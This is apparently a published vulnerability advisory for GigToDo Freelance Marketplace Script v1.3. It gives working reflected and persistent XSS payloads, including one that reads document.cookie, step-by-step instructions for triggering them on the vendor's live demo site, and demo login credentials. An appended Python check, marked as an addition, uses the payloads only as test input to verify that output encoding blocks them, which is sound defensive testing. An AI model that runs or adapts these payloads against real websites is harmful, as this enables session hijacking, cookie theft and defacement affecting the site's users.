* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections
* # Google Dork: -
* # Date: 2019/07/28
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79
::- Details & Description -::
::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Frontend (auth): https://www.gigtodo.com/login.php
~ Login / Password (buyer/seller) #1: pat / Pat
~ Login / Password (buyer/seller) #2: patricia / Pat
~ Login / Password (buyer/seller) #3: tyrone / Pat
~ Login / Password (buyer/seller) #4: jess / Pat
::- Special Note -::
~ Web-application price is $175, 14 Sales.
~ «Script is fully protected from SQL Injection and XSS.» © Pixinal_Studio (web-app author)
~ «When you purchase the script, as long as you do not share your admin credentials, you are completely protected. Hope this makes sense?» © Pixinal_Studio (web-app author)
~ On the demo website you'll face the Mod_Security WAF, which is possible to bypass. There is no guarantee that customers will use any kind of WAF, so the entire exploitation process may be much easier. Plus, most of the time users really don't care about security stuff, so passwords for the admin area can be brute-forced or an admin session can be hijacked via an XSS attack vector. At this point, the possibility to create an executable .PHP file with users' content inside is a huge security breach and a time bomb in the design of any web-app.
~ Disabling any data changes on demo websites doesn't make your applications more secure. It's good for business and sales, but you are simply double-crossing your clients. The same goes if you do not recognize the fact of breaches in the web-app design, putting your ego above the safety of your customers.
::- PoC Links -::
::- PoC [Reflected XSS Injection] -::
~ For reflected XSS injection, use the search bar or go to the https://www.gigtodo.com/search page and use a payload like one of those listed below.
~ Example #1: <img src='x'+/onerror=(alert)('m0ze')>
~ Example #2: <body +/onload=(alert)('m0ze')>m0ze</body>
~ Example #3: <body +/onload=(alert)(document.cookie)>m0ze</body>
~ Example #4: <svg/onload='window.open(`https://twitter.com/m0ze_ru`);'>
::- PoC [Persistent XSS Injection] -::
~ Register a new account or use one of the accounts provided for the demo website: pat / Pat || patricia / Pat || tyrone / Pat || jess / Pat, log in and go to the https://www.gigtodo.com/proposals/create_proposal page. The vulnerable text area is «Proposal's Description», so paste ur payload inside, fill in the other fields and save the data TWICE (if u don't understand it, read the «Important Stuff» below).
~ Example #1: <h1 onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is fully protected from SQL Injection and XSS ©`);'><img src='x' onerror=';alert(`For sure lol`);'>
~ Example #2: <h1 onmouseover=';alert(`Greetz from m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`https://twitter.com/m0ze_ru`);'>
::- PoC [Important Stuff] -::
~ Keep in mind that u need to save ur payload inside the «Proposal's Description» text area TWICE or ur payload WILL NOT WORK. So literally paste ur payload inside the «Proposal's Description» text area and scroll down to the «Update Proposal» button, press it and ur data will be saved. After that u'll be redirected to the https://www.gigtodo.com/proposals/view_proposals.php page. Select ur created proposal, press the green square dropdown menu on the right («Actions» column) and click on the «Edit» link. After that just don't change anything, scroll down to the «Update Proposal» button, press it and ur data will be saved ONE MORE TIME. That's it, now ur payload will work.
~ If u are using any redirects inside the payload, then DISABLE JS WHILE U EDIT UR PROPOSAL or u just won't be able to re-save the data. And don't forget that u can use links with ur proposal ID to edit it ( https://www.gigtodo.com/proposals/edit_proposal?proposal_id=XX ).
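
Added example (not part of the original advisory and not the vendor's code): a Python regression check for the fix side of both findings above, the reflected search term and the stored «Proposal's Description». It renders a value into a page fragment with and without output encoding, then parses the result to confirm the encoded version contains no element or event handler the template did not define. The template and the names `render`, `MarkupAudit` and `audit` are hypothetical; the payloads are the ones quoted above, used only as test input.

```python
import html
from html.parser import HTMLParser

# Payloads quoted verbatim from the PoC sections above; used only as test input.
PAYLOADS = [
    "<img src='x'+/onerror=(alert)('m0ze')>",
    "<body +/onload=(alert)(document.cookie)>m0ze</body>",
    "<h1 onmouseover=';alert(`Greetz from m0ze`);'>m0ze</h1>1\"-->"
    "<svg/onload=';window.location.replace(`https://twitter.com/m0ze_ru`);'>",
]

# Hypothetical page fragment (an assumption, not the application's markup): the
# value is echoed into an attribute and into element content.
TEMPLATE = '<div><input name="q" value="{v}"><h2>Results for {v}</h2></div>'
TEMPLATE_TAGS = {"div", "input", "h2"}

def render(value, encode):
    """Render the fragment; encode=False reproduces the vulnerable pattern."""
    shown = html.escape(value, quote=True) if encode else value
    return TEMPLATE.format(v=shown)

class MarkupAudit(HTMLParser):
    """Collects elements and event-handler attributes the template did not define."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self.text = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in TEMPLATE_TAGS:
            self.findings.append(f"unexpected element <{tag}>")
        self.findings += [f"event handler {name} on <{tag}>"
                          for name, _ in attrs if name.startswith("on")]

    def handle_data(self, data):
        self.text.append(data)

def audit(value, encode):
    """Return (findings, visible text) for one rendered value."""
    parser = MarkupAudit()
    parser.feed(render(value, encode))
    parser.close()
    return parser.findings, "".join(parser.text)

if __name__ == "__main__":
    for p in PAYLOADS:
        print(audit(p, encode=False)[0], "->", audit(p, encode=True)[0])
```

Encoding has to happen at output time for every context the value is written into; this check only covers HTML element content and quoted attribute values, not script or URL contexts.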